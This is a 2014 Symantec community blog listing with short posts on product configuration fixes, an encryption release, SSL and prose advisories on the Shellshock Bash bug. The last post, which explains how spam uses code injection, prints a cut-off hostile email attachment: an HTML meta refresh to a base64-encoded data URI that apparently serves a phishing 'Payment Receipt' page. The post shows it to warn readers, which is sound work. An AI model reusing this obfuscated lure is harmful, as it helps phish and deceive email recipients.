Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Community Blog
Showing posts in English
Dhasan | 16 Oct 2014 | 0 comments

In Data Center Security Server Advance 6.0

If you navigate to the below location

DCS console - > Admin - > Settings - View configuration - > Master Server : 'Server Name and IP address'

When you have 2 or more DCS server installed and using same SQL DB, you will see the same name on all the DCS console.

This is actually not referring to the Primary DCS server.

It refers to which DCS server is resposible to send an alerts.

To determine, if you have got 2 DCS server , turn off your actualy primary DCS server, then you will see the 'Master server' name shows your secondary DCS server name.

master server.jpg

James L | 14 Oct 2014 | 0 comments

Google recently announced the https certificate update to its search algorithm, it will directly impact on your website ranking, if your website carry the SSL Certificate then you will get the “Google Ranking” boost up. But think why Google is giving the more important to websites which has an SSL Certificate let me explain you.

https_0.PNG

An SSL Certificate is create a secure layer between your web browser and visitors’ web browsers, and making important data like banking & personal details in encrypted format. As phishing attacks are increasing nowadays, online security is major concern for the world. Google believes that by penalized the websites which don’t have an SSL Certificate, owners of the websites create the benchmark that show users are more likely to visit a websites which are secure with “https” and by this way people become more aware about online web security and the...

Dhasan | 09 Oct 2014 | 1 comment

SEPM home page dash board is not updating quickly

After SEP client installation shows under up-to-date category even though the client is not up-to-date

This is observed if we install SEP Client using the package exported from SEPM a month or week ago...and the LU policy is set not to download updates from SEPM or directly from Symantec...that client goes to up-to-date category then after long time..it disappears from that then it goes to out-of-date..

AV - up to date.png

av -up to date.jpg

av -up to date 1.jpg

Chetan Savade | 07 Oct 2014 | 5 comments

Hello Everyone,

Symantec Endpoint Encryption v11.0.0 has been released. Release is now available on fileconnect to download.

New enhancements have been introuduced in the release, few of them are listed here:

Feature Highlights:

New integrated Endpoint Encryption client:

o   Built on PGP technology

o   Managed by Symantec Endpoint Encryption Management Server

Various client deployment options:

o   Provides support for never-connected and seldom-connected client deployment

o   Policy delivery though GPO, native policy or install-time policy

o   Seamless user registration and enrollment

Various Drive Encryption Recovery Options:

o   Help Desk...

Sankara | 06 Oct 2014 | 0 comments

Issue : Symantec Data Center Security 6.0 client not getting IP via DHCP even with Windows core policy

Cause : Known issue with SDCSS 6.0  -  Windows default core policy is not allowing svchost.exe to access DHCPCSVC.DLL

Environment : Symantec Data Center Security 6.0

Solution : 

Edit the SDCSS prevention policy

Navigate to 

 Sandboxes

  - Core OS Service Options

    - Default Windows Services [def_winsvcs_ps,netsvcs_ps]

       - Registry Rules

         - Writeable resource List

             - Allow but log modifications to these Registry keys

Resource Path:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services

Program Path: %systemroot%\system32\svchost.exe

Also add DHCPCSVC.DLL to writable...

vgtero | 03 Oct 2014 | 1 comment

There is a new vulnerability in the commonly used UNIX shell BASH, which the media is now calling Shellshock.  

What is Shellshock? 

A new vulnerability has been found that potentially affects most versions of the Linux and UNIX operating systems, in addition to Mac OS X (which is based around Unix). Known as the “Bash Bug” or “Shellshock,” the GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271) could allow an attacker to gain control over a targeted computer if exploited successfully.

The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and UNIX. Bash acts as a command language interpreter. In other words, it allows the user to type commands into a simple text-based window, which the operating system will then run.

For full details see: the Symantec Security...

jjesse | 03 Oct 2014 | 0 comments

Recently I was doing an install of Symantec DLP on a Red Hat Linux box that was a member of LDAP and had the /home folder automounted and didn't allow for us to write to that folder.  When a new local user was created via the adduser command it would not work without passing a command line option to change the location of the home directory (adduser -b /opt/users/).

During the install of Symantec DLP, the installer creates a user (protect, protect_update) and would fail because the home directory (/home/protect) could not be created.

So the question was asked… Can we create a user, populate the home directory outside of /home and then perform the install of the system?

Answer:  No… The installer for Symantec DLP needs to create the correct users and must be able to write /home when creating the user.  There is currently an enhancement request within Symantec to allow a pre-created account.

vgtero | 01 Oct 2014 | 0 comments

There is a new vulnerability in the commonly used Unix shell BASH, which the media is now calling Shellshock.   Customers that have Critical Systems Protection/Data Center Security: Server Advanced can use their investments to protect their server infrastructure from this vulnerability. 

Situation Overview:   What is “Shellshock?” 

A new vulnerability has been found that potentially affects most versions of the Linux and Unix operating systems, in addition to Mac OS X (which is based around Unix). Known as the “Bash Bug” or “ShellShock,” this vulnerability could allow an attacker to gain control over a targeted computer if exploited successfully.

The vulnerability affects Bash, a common component known as a shell that appears in many versions of Linux and Unix. Bash acts as a command language interpreter. In other words, it allows the user to type commands into a simple text-based window, which the operating...

Dhasan | 29 Sep 2014 | 0 comments

Issue : Non-English character is not showing up in Symantec Endpoint Protection Manager reports in Excel

Cause : SEPM compatible with UTF-8 encoding

Solution :

1. Open the CSV report file in Notepad.

2. Click on save as 'UTF-8' under encoding.

3. Then Open CSV in Excel.

mon_raralio | 22 Sep 2014 | 3 comments

Hi all! It's been a while since I was here (a little over 2 years). A lot has changed. Anyway, let's get to it.

How Code injection is used

I've received 2 spam mails on my Yahoo account, which by the way, scans any attachments using Norton. There is an http attachment which I wouldn't recommend you clicking on to open a new browser tab or window. The attachment looks like this:

<html>
<title> </title>
<meta http-equiv="refresh" content="0;data:text/html;base64,DQo8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtDQoNCnRyYW5zaXRpb25hbC5kdGQiPjxodG1sIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCjxoZWFkPg0KPHRpdGxlPlBheW1lbnQgUmVjZWlwdDwvdGl0bGU+DQo8ZnJhbWVzZXQ+...